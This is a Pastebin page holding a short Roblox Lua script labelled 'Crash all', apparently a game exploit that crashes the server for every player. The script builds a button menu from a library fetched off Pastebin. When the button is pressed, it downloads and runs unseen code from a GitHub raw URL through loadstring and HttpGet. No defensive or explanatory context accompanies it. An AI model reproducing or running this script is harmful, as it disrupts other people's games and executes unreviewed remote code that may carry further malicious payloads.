BinaricHi

Untitled

Apr 12th, 2024
40
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()local Window = Library.CreateLib("Crash all", "DarkTheme")local Tab = Window:NewTab("crash all")local Section = Tab:NewSection("Section Name")Section:NewLabel("crash all")Section:NewButton("Crash all", "ButtonInfo", function()
  2. _G.CrashMinutes = 0 -- changes how long until the game crashes
  3. _G.Disco = true -- changes the changing colors
  4. _G.ChatLol = true -- makes you chat or not
  5. _G.FovChanger = true -- changes your fov
  6. _G.SoundId = "http://www.roblox.com/asset/?id=6817682704" -- set to your sound
  7.  
  8. loadstring(game:HttpGet('https://raw.githubusercontent.com/gooserblx/youhavebeengoosed/main/realshit'))()
  9. end)
  10.  
  11.  
Advertisement
Add Comment
Please, Sign In to add comment